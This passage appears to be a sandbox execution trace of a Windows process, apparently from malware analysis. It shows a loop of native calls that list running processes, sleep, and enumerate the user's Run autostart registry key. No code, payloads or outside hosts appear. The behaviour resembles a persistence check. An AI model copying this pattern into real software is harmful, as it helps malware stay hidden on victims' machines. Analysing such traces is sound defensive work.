BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.511] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.511] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.511] NtClose (Handle=0x154) returned 0x0 [0178.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.527] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.542] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.543] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.543] NtClose (Handle=0x154) returned 0x0 [0178.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.547] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.573] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.574] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.574] NtClose (Handle=0x154) returned 0x0 [0178.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.578] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.589] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.590] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.590] NtClose (Handle=0x154) returned 0x0 [0178.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.606] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.606] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.606] NtClose (Handle=0x154) returned 0x0 [0178.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.612] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.620] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.620] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.620] NtClose (Handle=0x154) returned 0x0 [0178.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.624] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.636] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.636] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.636] NtClose (Handle=0x154) returned 0x0 [0178.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.640] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.652] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.652] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.652] NtClose (Handle=0x154) returned 0x0 [0178.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.656] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.668] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.668] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.668] NtClose (Handle=0x154) returned 0x0 [0178.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.683] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.683] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.683] NtClose (Handle=0x154) returned 0x0 [0178.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.687] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.698] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.698] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.698] NtClose (Handle=0x154) returned 0x0 [0178.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.702] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.714] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.714] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.714] NtClose (Handle=0x154) returned 0x0 [0178.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.748] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0178.748] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0178.748] NtClose (Handle=0x154) returned 0x0 [0178.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0178.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0178.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0178.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0178.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0178.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0178.752] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0178.761] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), 